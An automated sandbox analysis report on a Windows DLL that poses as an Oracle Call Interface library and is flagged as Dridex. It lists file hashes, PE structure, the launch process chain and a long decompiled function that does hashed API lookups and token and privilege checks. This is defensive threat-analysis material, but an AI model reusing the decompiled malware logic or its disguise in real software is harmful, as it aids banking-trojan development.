Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	24576
Entropy (8bit):	4.0345755638050464
Encrypted:	false
SSDEEP:	384:e1Ez5Rftx1nPJ4X8sFcnE7koPBqXtSeq5QMVyi6+/8l4Lk4xZd1DoXzneXvwvI:WENRftx1PJ4X5FcE7VBqXseq5QMVyi6j
MD5:	50450D0949002809FB441A3343BD4957
SHA1:	9CBBBAA5EEA9963EC22F69B7578FAD5D8981179A
SHA-256:	69A6AE8B8F0D55BFAE3ED5C2483B501CF4A85B628528681601CE63FE3D35ADF3
SHA-512:	EE1B15A3B492B46F2657E4918D2F9DE6720C072C5E7A952A19A5DDCC6BC305F674BE5B4BFFF0963FB571C9C034AAB8FEE38AB6C79C6A6752CFCA976060076B87
Malicious:	false
Reputation:	low
Preview:	regfY...Y...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm.bX..................................................................................................................................................................................................................................................................................................................................................)\.HvLE.^......Y.............{...Kb..+..p[..........0................... ..hbin................p.\..,..........nk,..<p..................................... ...........................&...{ad79c032-a2ea-f756-e377-72fb9332c3ae}......nk ..<p......... ........................... .......Z.......................Root........lf......Root....nk ..<p......................}.............. ...............*...............DeviceCensus.......................vk..................WritePermissionsCheck...

Static File Info

General
File type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.341894166997632
TrID:	Win32 Dynamic Link Library (generic) (1002004/3) 99.60% Generic Win/DOS Executable (2004/3) 0.20% DOS Executable Generic (2002/1) 0.20% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Pv3ZsGsdfS.dll
File size:	565248
MD5:	63c22ce32346e029fa5a1ec1ae619d0f
SHA1:	222cf86c3b59f466292bb734be308cda77c3ddff
SHA256:	efbd76616dc1cd8210a8c54611f4ffa88e635f0f6ded2f8ff48311737635edda
SHA512:	413efdf48b13d8cd6cb9f799215a7c34588995ba5f48c4db855ad332c3b4b6b7c753ff361d0cd850a728ec68c76b47e96aaac604f3bdb069920d930c422bd0f4
SSDEEP:	12288:jGBK1zWlDqhPUVpqF9q9FAfPWvF+r3qTFCX1za7EV8RgfQOOvDC93:jNkIu2KAGIOwZ+v
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........R...<...<...<..k....<...=.S.<.=.....<.......<.......<.t.?...<.t.=.4.<.L.9...<.t...0.<..k....<..0..x.<.......<..1....<..k....<

File Icon


Icon Hash:	74f0e4ecccdce0e4

Static PE Info

General
Entrypoint:	0x10005a80
Entrypoint Section:	.rdata
Digitally signed:	false
Imagebase:	0x10000000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x61C43E40 [Thu Dec 23 09:15:44 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	7119acbff3b38a52756367cf5bfb78f2

Entrypoint Preview

Instruction
inc eax
mov edx, 00000003h
cmpps xmm1, xmm0, 02h
jmp 00007F7990999F06h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
push esi
push ebx
push edi
and esp, FFFFFFF8h
sub esp, 000000E8h
lea eax, dword ptr [esp+00000084h]
lea ecx, dword ptr [esp+23h]
mov word ptr [esp+000000D4h], 0F55h
mov edx, dword ptr [esp+000000CCh]
mov esi, edx
or esi, esi
mov dword ptr [esp+000000CCh], esi
mov byte ptr [esp+000000CBh], 0000000Eh
mov word ptr [esp+000000D2h], EED6h
mov dword ptr [esp+000000C4h], 00440CD0h
mov word ptr [esp+66h], C76Dh
mov bl, byte ptr [esp+000000D7h]
mov di, word ptr [esp+66h]
mov byte ptr [eax+eax+00000000h], bl

Rich Headers

Programming Language:

[IMP] VS2015 UPD1 build 23506
[C++] VS2012 UPD1 build 51106
[ASM] VS2012 build 50727
[ASM] VS2012 UPD2 build 60315
[LNK] VS2010 SP1 build 40219
[EXP] VS2010 SP1 build 40219
[RES] VS2015 UPD1 build 23506
[IMP] VS2010 build 30319
[ASM] VS2015 UPD1 build 23506
[C++] VS2017 v15.5.4 build 25834
[EXP] VS2012 UPD4 build 61030
[C++] VS2008 build 21022
[ASM] VS2010 SP1 build 40219

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x81079	0x60	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x810dc	0x78	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x89000	0x2f0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x8a000	0x1138	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x6030	0x38	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x44	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.rdata	0x1000	0x699e	0x7000	False	0.390206473214	data	4.46675995806	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x79ed0	0x7a000	False	0.303953076972	data	7.45734301056	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x82000	0x6178	0x5000	False	0.246435546875	data	5.05789801748	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x89000	0x2f0	0x1000	False	0.090087890625	data	0.791740378228	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x8a000	0x1138	0x2000	False	0.242065429688	data	4.12259394173	IMAGE_SCN_TYPE_COPY, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_VERSION	0x89060	0x290	MS Windows COFF PA-RISC object file	English	United States

Imports

DLL	Import
KERNEL32.dll	GetModuleHandleW, CloseHandle, IsDebuggerPresent, OutputDebugStringA, GetModuleFileNameW, GetFileSize
ADVAPI32.dll	AccessCheck, RegCloseKey, QueryServiceStatus
USER32.dll	GetWindowTextA
WINSPOOL.DRV	EnumFormsW
WS2_32.dll	WSACleanup

Version Infos

Description	Data
OriginalFilename	Shi.dll
FileDescription	Oracle Call Interface
FileVersion	2.9.9.7.0
Legal Copyright	Copyright Oracle Corporation 1979, 2001. All rights reserved.
CompanyName	Oracle Corporation
Translation	0x0409 0x04b0

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

No network behavior found

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: loaddll32.exe PID: 6484 Parent PID: 3416

General

Start time:	09:14:19
Start date:	24/12/2021
Path:	C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):	true
Commandline:	loaddll32.exe "C:\Users\user\Desktop\Pv3ZsGsdfS.dll"
Imagebase:	0x1220000
File size:	116736 bytes
MD5 hash:	7DEB5DB86C0AC789123DEC286286B938
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000000.00000002.817398169.000000006EC61000.00000020.00020000.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: cmd.exe PID: 1964 Parent PID: 6484

General

Start time:	09:14:20
Start date:	24/12/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /C rundll32.exe "C:\Users\user\Desktop\Pv3ZsGsdfS.dll",#1
Imagebase:	0xd80000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 4492 Parent PID: 1964

General

Start time:	09:14:20
Start date:	24/12/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\Pv3ZsGsdfS.dll",#1
Imagebase:	0x1270000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000003.00000000.297484396.000000006EC61000.00000020.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000003.00000000.299069466.000000006EC61000.00000020.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000003.00000002.335772232.000000006EC61000.00000020.00020000.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: WerFault.exe PID: 4716 Parent PID: 4492

General

Start time:	09:14:23
Start date:	24/12/2021
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 676
Imagebase:	0xba0000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: loaddll32.exe PID: 6484 Parent PID: 3416 loaddll32.exeCOMMON

Executed Functions

Function 6EC70730, Relevance: 5.2, APIs: 3, Instructions: 650
COMMONCrypto

Download Yara Rule

C-Code - Quality: 83%

			E6EC70730(void* __ecx) {
				void* __ebx;
				void* __esi;
				void* __ebp;
				intOrPtr _t155;
				signed char* _t159;
				char _t162;
				void* _t180;
				intOrPtr _t189;
				char _t190;
				intOrPtr _t196;
				intOrPtr _t200;
				void* _t203;
				void* _t212;
				void* _t213;
				void* _t215;
				void* _t216;
				void* _t223;
				void* _t238;
				void* _t241;
				void* _t244;
				void* _t247;
				void* _t250;
				void* _t254;
				void* _t259;
				void* _t265;
				void* _t268;
				int _t271;
				void* _t272;
				void* _t276;
				void* _t277;
				void* _t278;
				void* _t282;
				int _t288;
				intOrPtr* _t291;
				signed char _t294;
				signed char _t295;
				intOrPtr* _t320;
				intOrPtr* _t325;
				intOrPtr* _t363;
				char _t364;
				intOrPtr* _t372;
				void* _t377;
				void* _t382;
				void* _t383;
				void* _t384;
				void* _t385;
				void* _t386;
				void* _t387;
				void* _t393;
				void* _t395;
				void* _t401;
				void* _t403;
				intOrPtr* _t404;
				signed int _t406;
				intOrPtr* _t409;
				void* _t411;
				signed int _t413;
				void* _t414;
				void* _t415;
				void* _t420;
				intOrPtr* _t423;
				void* _t425;
				void** _t427;
				void* _t428;
				void* _t429;

				_t414 = __ecx;
				_t155 =  *0x6ec7d1f8;
				if(_t155 == 0x4c71e88d) {
					_t155 = E6EC7361C(0x30);
					 *0x6ec7d1f8 = _t155;
				}
				if( *((char*)(_t155 + 0xb)) == 0 || _t414 != 0) {
					_t415 = _t428 + 0x48;
					E6EC73698(_t415, 0, 0x11c);
					_t429 = _t428 + 0xc;
					 *((intOrPtr*)(_t429 + 0x48)) = 0x11c;
					if(E6EC7306C(0x8e844d1e, 0xcf311107, 0x8e844d1e, 0x8e844d1e) != 0) {
						_push(_t415);
						asm("int3");
						asm("int3");
					}
					_t404 =  *0x6ec7d1f8;
					_t159 = _t429 + 0x4c;
					_t294 =  *_t159;
					 *(_t404 + 8) = _t294;
					_t295 = _t159[4];
					 *(_t404 + 9) = _t295;
					 *((char*)(_t404 + 0xa)) = _t159[0x110];
					 *((intOrPtr*)(_t404 + 4)) =  *((intOrPtr*)(_t429 + 0x54));
					 *((char*)(_t404 + 0xc)) = 0 | _t159[0x116] != 0x00000001;
					 *_t404 = (_t295 & 0x000000ff) + ((_t294 & 0x000000ff) << 4) - 0x50;
					_t162 = E6EC70FF8(_t404);
					 *(_t429 + 0x198) = 0;
					 *((char*)( *0x6ec7d1f8 + 0xb)) = _t162;
					_t363 = E6EC7306C(0x150c05fc, 0x1da4d409, _t162, _t162);
					if(_t363 == 0) {
						L12:
						_t364 = 0;
						L13:
						 *((char*)( *0x6ec7d1f8 + 0x28)) = _t364;
						if( *((intOrPtr*)(E6EC70730(0))) >= 0x10) {
							_push(6);
							memcpy(_t429 + 0x164, 0x6ec7bce0, 0 << 2);
							_t429 = _t429 + 0xc;
							 *((intOrPtr*)(_t429 + 0x1c)) = 0;
							E6EC6F584(_t429 + 0x24, 0);
							_t406 = 0;
							__eflags = 0;
							do {
								E6EC6F828(_t429 + 0x24, E6EC6F4CC(_t429 + 0x20) + 4);
								 *((intOrPtr*)(E6EC6F4BC(_t429 + 0x24, E6EC6F4CC(_t429 + 0x20) + 0xfffffffc))) =  *((intOrPtr*)(_t429 + 0x164 + _t406 * 4));
								_t406 = _t406 + 1;
								 *((intOrPtr*)(_t429 + 0x1c)) =  *((intOrPtr*)(_t429 + 0x1c)) + 1;
								__eflags = _t406 - 6;
							} while (_t406 < 6);
							_push(0);
							E6EC75580(_t429 + 0xc, _t429 + 0x1c, 0x80000002);
							E6EC6F654(_t429 + 0x20);
							E6EC755B0(_t429 + 8, _t429 + 0x1c0, 0xc0092a94);
							_t180 = E6EC75864(_t429 + 4, __eflags,  *((intOrPtr*)(_t429 + 0x1c0)));
							_t407 = _t180;
							E6EC6DFA4(_t429 + 0x1c0);
							__eflags = _t180;
							if(_t180 != 0) {
								E6EC755B0(_t429 + 8, _t429 + 0x1c8, 0x1e55aaec);
								_t420 = E6EC75864(_t429 + 4, __eflags,  *((intOrPtr*)(_t429 + 0x1c8)));
								E6EC6DFA4(_t429 + 0x1c8);
								_t407 = _t429 + 0x1d0;
								E6EC755B0(_t429 + 8, _t429 + 0x1d0, 0x360d0c74);
								_t401 = E6EC75864(_t429 + 4, __eflags,  *(_t429 + 0x1d0));
								E6EC6DFA4(_t429 + 0x1d0);
								__eflags = _t420;
								if(_t420 != 0) {
									__eflags = _t420 - 5;
									if(_t420 != 5) {
										__eflags = _t420 - 2;
										if(_t420 != 2) {
											L58:
											E6EC6CFDC(_t429 + 0xc);
											__eflags =  *((char*)(_t429 + 8));
											if( *((char*)(_t429 + 8)) == 0) {
												L65:
												_t189 = 0;
												__eflags = 0;
												 *(_t429 + 4) = 0;
												goto L66;
											}
											_t382 =  *(_t429 + 4);
											__eflags = _t382;
											if(_t382 == 0) {
												L61:
												_t238 = 1;
												L63:
												__eflags = _t238;
												if(_t238 == 0) {
													E6EC75558(_t382);
												}
												goto L65;
											}
											__eflags = _t382 - 0xffffffff;
											if(_t382 != 0xffffffff) {
												_t238 = 0;
												__eflags = 0;
												goto L63;
											}
											goto L61;
										}
										__eflags = _t401 - 1;
										if(_t401 != 1) {
											goto L58;
										}
										E6EC6CFDC(_t429 + 0xc);
										__eflags =  *((char*)(_t429 + 8));
										if( *((char*)(_t429 + 8)) == 0) {
											L57:
											 *(_t429 + 4) = 0;
											_t189 = 5;
											goto L66;
										}
										_t383 =  *(_t429 + 4);
										__eflags = _t383;
										if(_t383 == 0) {
											L53:
											_t241 = 1;
											L55:
											__eflags = _t241;
											if(_t241 == 0) {
												E6EC75558(_t383);
											}
											goto L57;
										}
										__eflags = _t383 - 0xffffffff;
										if(_t383 != 0xffffffff) {
											_t241 = 0;
											__eflags = 0;
											goto L55;
										}
										goto L53;
									}
									__eflags = _t401;
									if(_t401 != 0) {
										__eflags = _t401 - 1;
										if(_t401 == 1) {
											E6EC6CFDC(_t429 + 0xc);
											__eflags =  *((char*)(_t429 + 8));
											if( *((char*)(_t429 + 8)) == 0) {
												L121:
												 *(_t429 + 4) = 0;
												_t189 = 4;
												goto L66;
											}
											_t384 =  *(_t429 + 4);
											__eflags = _t384;
											if(_t384 == 0) {
												L117:
												_t244 = 1;
												L119:
												__eflags = _t244;
												if(_t244 == 0) {
													E6EC75558(_t384);
												}
												goto L121;
											}
											__eflags = _t384 - 0xffffffff;
											if(_t384 != 0xffffffff) {
												_t244 = 0;
												__eflags = 0;
												goto L119;
											}
											goto L117;
										}
										goto L58;
									}
									E6EC6CFDC(_t429 + 0xc);
									__eflags =  *((char*)(_t429 + 8));
									if( *((char*)(_t429 + 8)) == 0) {
										L45:
										 *(_t429 + 4) = 0;
										_t189 = 3;
										goto L66;
									}
									_t385 =  *(_t429 + 4);
									__eflags = _t385;
									if(_t385 == 0) {
										L41:
										_t247 = 1;
										L43:
										__eflags = _t247;
										if(_t247 == 0) {
											E6EC75558(_t385);
										}
										goto L45;
									}
									__eflags = _t385 - 0xffffffff;
									if(_t385 != 0xffffffff) {
										_t247 = 0;
										__eflags = 0;
										goto L43;
									}
									goto L41;
								}
								__eflags = _t401;
								if(_t401 != 0) {
									goto L58;
								}
								E6EC6CFDC(_t429 + 0xc);
								__eflags =  *((char*)(_t429 + 8));
								if( *((char*)(_t429 + 8)) == 0) {
									L35:
									 *(_t429 + 4) = 0;
									_t189 = 2;
									goto L66;
								}
								_t386 =  *(_t429 + 4);
								__eflags = _t386;
								if(_t386 == 0) {
									L31:
									_t250 = 1;
									L33:
									__eflags = _t250;
									if(_t250 == 0) {
										E6EC75558(_t386);
									}
									goto L35;
								}
								__eflags = _t386 - 0xffffffff;
								if(_t386 != 0xffffffff) {
									_t250 = 0;
									__eflags = 0;
									goto L33;
								}
								goto L31;
							}
							E6EC6CFDC(_t429 + 0xc);
							__eflags =  *((char*)(_t429 + 8));
							if( *((char*)(_t429 + 8)) == 0) {
								L25:
								 *(_t429 + 4) = 0;
								_t189 = 1;
								goto L66;
							}
							_t387 =  *(_t429 + 4);
							__eflags = _t387;
							if(_t387 == 0) {
								L21:
								_t254 = 1;
								L23:
								__eflags = _t254;
								if(_t254 == 0) {
									E6EC75558(_t387);
								}
								goto L25;
							}
							__eflags = _t387 - 0xffffffff;
							if(_t387 != 0xffffffff) {
								_t254 = 0;
								__eflags = 0;
								goto L23;
							}
							goto L21;
						} else {
							_t189 = 1;
							L66:
							 *((intOrPtr*)( *0x6ec7d1f8 + 0x24)) = _t189;
							_t190 = E6EC71030(0xffffffffffffffff);
							_t320 =  *0x6ec7d1f8;
							 *((char*)(_t320 + 0x29)) = _t190;
							 *((intOrPtr*)(_t320 + 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x1d4));
							if( *_t320 >= 0x10) {
								__eflags = 0xffffffffffffffff;
								 *((intOrPtr*)( *0x6ec7d1f8 + 0x2c)) = E6EC710A4(0x6ec7d1f8, 0xffffffffffffffff);
								L78:
								if(E6EC7306C(0x8e844d1e, 0x925d7fea, 0x8e844d1e, 0x8e844d1e) != 0) {
									GetSystemInfo(_t429 + 0x164); // executed
								}
								_t196 =  *0x6ec7d1f8;
								_t291 = _t429 + 0x178;
								_t409 = _t429 + 0x170;
								 *((short*)(_t196 + 0xe)) =  *_t291;
								 *((intOrPtr*)(_t196 + 0x10)) =  *((intOrPtr*)(_t291 - 0x10));
								 *((intOrPtr*)(_t196 + 0x14)) =  *((intOrPtr*)(_t291 - 0xc));
								 *((intOrPtr*)(_t196 + 0x18)) =  *_t409;
								 *((intOrPtr*)(_t196 + 0x1c)) =  *((intOrPtr*)(_t409 + 0x10));
								return _t196;
							}
							 *(_t429 + 0x19c) = 0;
							_t372 = E6EC7306C(0x150c05fc, 0x1da4d409, 0x150c05fc, 0x150c05fc);
							if(_t372 == 0) {
								L74:
								_t200 =  *0x6ec7d1f8;
								if( *((char*)(_t200 + 0x28)) == 0) {
									 *((intOrPtr*)(_t200 + 0x2c)) = 3;
								} else {
									 *((intOrPtr*)(_t200 + 0x2c)) = 5;
								}
								goto L78;
							}
							_push(_t429 + 0x19c);
							_push(8);
							_push(0xffffffff);
							if( *_t372() == 0) {
								_t203 = E6EC735F0(_t407);
								__eflags = _t203;
								if(_t203 != 0) {
									goto L74;
								}
							}
							 *(_t429 + 0x30) =  *(_t429 + 0x19c);
							 *((char*)(_t429 + 0x34)) = 1;
							 *(_t429 + 0x1a4) = 0;
							_t325 = E6EC7306C(0x150c05fc, 0xf2377aa1, 0x150c05fc, 0x150c05fc);
							if(_t325 != 0) {
								_push(_t429 + 0x1a4);
								_push(0);
								_push(0);
								_push(1);
								_push( *(_t429 + 0x1ac));
								if( *_t325() == 0) {
									E6EC735F0(_t407);
								}
							}
							_t206 =  *(_t429 + 0x1a4);
							if( *(_t429 + 0x1a4) != 0) {
								E6EC6F584(_t429 + 0x18c, _t206);
								_t411 = E6EC7306C(0x150c05fc, 0xf2377aa1, 0x150c05fc, 0x150c05fc);
								__eflags = _t411;
								if(_t411 == 0) {
									L133:
									E6EC6F654(_t429 + 0x188);
									goto L72;
								}
								_t212 = E6EC6F4BC(_t429 + 0x18c, 0);
								_t213 = E6EC6F4CC(_t429 + 0x188);
								_t215 =  *_t411( *(_t429 + 0x1ac), 1, _t212, _t213, _t429 + 0x1a4);
								__eflags = _t215;
								if(_t215 == 0) {
									_t216 = E6EC735F0(_t411);
									__eflags = _t216;
									if(_t216 != 0) {
										goto L133;
									}
								}
								_t423 = E6EC6F4BC(_t429 + 0x18c, 0);
								E6EC6DF4C(_t429 + 0x1b4, 0);
								 *(_t429 + 0x1ac) = 0;
								_t377 = E6EC7306C(0x150c05fc, 0xfc1a24a1, 0x150c05fc, 0x150c05fc);
								__eflags = _t377;
								if(_t377 != 0) {
									 *_t377( *_t423, _t429 + 0x1ac);
								}
								E6EC6DFC0(_t429 + 0x1b4,  *(_t429 + 0x1ac));
								_t223 = E6EC7306C(0x8e844d1e, 0xda6a2597, 0x8e844d1e, 0x8e844d1e);
								__eflags = _t223;
								if(_t223 != 0) {
									_push( *(_t429 + 0x1ac));
									asm("int3");
									asm("int3");
								}
								E6EC6E06C(_t429 + 0x1b8 - 8, _t429 + 0x1b8);
								_t425 = E6EC74FFC( *((intOrPtr*)(_t429 + 0x1b8)), E6EC6E8A8( *((intOrPtr*)(_t429 + 0x1b8)), 0x7fffffff));
								E6EC6DFA4(_t429 + 0x1b8);
								E6EC6DFA4(_t429 + 0x1b0);
								E6EC6F654(_t429 + 0x188);
								__eflags =  *((char*)(_t429 + 0x34));
								if( *((char*)(_t429 + 0x34)) != 0) {
									E6EC6BB44(_t429 + 0x30);
								}
								__eflags = _t425 - 0x6df4cf7;
								if(_t425 != 0x6df4cf7) {
									goto L74;
								} else {
									 *((intOrPtr*)( *0x6ec7d1f8 + 0x2c)) = 6;
									goto L78;
								}
							} else {
								L72:
								if( *((char*)(_t429 + 0x34)) != 0) {
									E6EC6BB44(_t429 + 0x30);
								}
								goto L74;
							}
						}
					}
					_push(_t429 + 0x198);
					_push(8);
					_push(0xffffffff);
					if( *_t363() == 0) {
						_t259 = E6EC735F0(_t404);
						__eflags = _t259;
						if(_t259 != 0) {
							goto L12;
						}
					}
					 *(_t429 + 0x14) =  *(_t429 + 0x198);
					 *((char*)(_t429 + 0x18)) = 1;
					 *(_t429 + 0x1a0) = 0;
					if(E6EC7306C(0x150c05fc, 0xf2377aa1, 0x150c05fc, 0x150c05fc) != 0) {
						_t288 = GetTokenInformation( *(_t429 + 0x1a8), 2, 0, 0, _t429 + 0x1a0); // executed
						if(_t288 == 0) {
							E6EC735F0(_t404);
						}
					}
					_t262 =  *(_t429 + 0x1a0);
					if( *(_t429 + 0x1a0) != 0) {
						E6EC6F584(_t429 + 0x3c, _t262);
						_t265 = E6EC7306C(0x150c05fc, 0xf2377aa1, 0x150c05fc, 0x150c05fc);
						_t407 = _t265;
						__eflags = _t265;
						if(_t265 == 0) {
							L107:
							E6EC6F654(_t429 + 0x38);
							goto L10;
						}
						_t268 = E6EC6F4BC(_t429 + 0x3c, 0);
						_t271 = GetTokenInformation( *(_t429 + 0x1a8), 2, _t268, E6EC6F4CC(_t429 + 0x38), _t429 + 0x1a0); // executed
						__eflags = _t271;
						if(_t271 == 0) {
							_t272 = E6EC735F0(_t407);
							__eflags = _t272;
							if(_t272 != 0) {
								goto L107;
							}
						}
						_t427 = E6EC6F4BC(_t429 + 0x3c, 0);
						 *(_t429 + 0x1d8 - 0x30) = 0;
						asm("movsd");
						asm("movsb");
						asm("movsb");
						_t407 = E6EC7306C(0x150c05fc, 0x2351aaca, 0x150c05fc, 0x150c05fc);
						__eflags = _t407;
						if(_t407 == 0) {
							goto L107;
						}
						_t276 = _t429 + 0x1a8;
						_t277 =  *_t407(_t276 + 0x30, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0, _t276);
						__eflags = _t277;
						if(_t277 == 0) {
							_t278 = E6EC735F0(_t407);
							__eflags = _t278;
							if(_t278 != 0) {
								goto L107;
							}
						}
						_t403 =  *(_t429 + 0x1a8);
						__eflags =  *_t427;
						if( *_t427 <= 0) {
							L101:
							__eflags = _t403;
							if(_t403 == 0) {
								L103:
								_t393 = 1;
								L105:
								__eflags = _t393;
								if(_t393 == 0) {
									E6EC70FD4(_t403, _t407, _t403);
								}
								goto L107;
							}
							__eflags = _t403 - 0xffffffff;
							if(_t403 != 0xffffffff) {
								_t393 = 0;
								__eflags = 0;
								goto L105;
							}
							goto L103;
						}
						_t413 = 0;
						__eflags = 0;
						do {
							_t282 = E6EC7306C(0x150c05fc, 0xb4757511, 0x150c05fc, 0x150c05fc);
							__eflags = _t282;
							if(_t282 == 0) {
								goto L100;
							}
							_push( *((intOrPtr*)(_t427 + 4 + _t413 * 8)));
							_push( *(_t429 + 0x1ac));
							asm("int3");
							asm("int3");
							__eflags = _t282;
							if(_t282 == 0) {
								goto L100;
							}
							__eflags = _t403;
							if(_t403 == 0) {
								L93:
								_t395 = 1;
								L95:
								__eflags = _t395;
								if(_t395 == 0) {
									E6EC70FD4(_t403, _t413, _t403);
								}
								E6EC6F654(_t429 + 0x38);
								__eflags =  *((char*)(_t429 + 0x18));
								if( *((char*)(_t429 + 0x18)) != 0) {
									E6EC6BB44(_t429 + 0x14);
								}
								_t364 = 1;
								goto L13;
							}
							__eflags = _t403 - 0xffffffff;
							if(_t403 != 0xffffffff) {
								_t395 = 0;
								__eflags = 0;
								goto L95;
							}
							goto L93;
							L100:
							_t413 = _t413 + 1;
							__eflags = _t413 -  *_t427;
						} while (_t413 <  *_t427);
						goto L101;
					}
					L10:
					if( *((char*)(_t429 + 0x18)) != 0) {
						E6EC6BB44(_t429 + 0x14);
					}
					goto L12;
				} else {
					return _t155;
				}
			}

0x6ec7073f
0x6ec70741
0x6ec70748
0x6ec70fc7
0x6ec70fcd
0x6ec70fcd
0x6ec70752
0x6ec7075e
0x6ec7076a
0x6ec7076f
0x6ec7077c
0x6ec7078d
0x6ec7078f
0x6ec70790
0x6ec70791
0x6ec70791
0x6ec70792
0x6ec70796
0x6ec7079a
0x6ec7079f
0x6ec707a2
0x6ec707a8
0x6ec707c2
0x6ec707c9
0x6ec707cc
0x6ec707cf
0x6ec707d1
0x6ec707dd
0x6ec707ea
0x6ec707f7
0x6ec707fb
0x6ec70887
0x6ec70887
0x6ec70889
0x6ec7088d
0x6ec70898
0x6ec708ae
0x6ec708b1
0x6ec708b1
0x6ec708b5
0x6ec708be
0x6ec708c3
0x6ec708c3
0x6ec708c5
0x6ec708d6
0x6ec708f8
0x6ec708fa
0x6ec708fb
0x6ec708ff
0x6ec708ff
0x6ec70908
0x6ec70914
0x6ec7091d
0x6ec70933
0x6ec70943
0x6ec70948
0x6ec7094c
0x6ec70951
0x6ec70953
0x6ec709a3
0x6ec709b8
0x6ec709bc
0x6ec709c1
0x6ec709d2
0x6ec709e7
0x6ec709eb
0x6ec709f0
0x6ec709f2
0x6ec70a39
0x6ec70a3c
0x6ec70a8a
0x6ec70a8d
0x6ec70ace
0x6ec70ad2
0x6ec70ad7
0x6ec70adc
0x6ec70afb
0x6ec70afb
0x6ec70afb
0x6ec70afd
0x00000000
0x6ec70afd
0x6ec70ade
0x6ec70ae2
0x6ec70ae4
0x6ec70aeb
0x6ec70aeb
0x6ec70af1
0x6ec70af1
0x6ec70af3
0x6ec70af6
0x6ec70af6
0x00000000
0x6ec70af3
0x6ec70ae6
0x6ec70ae9
0x6ec70aef
0x6ec70aef
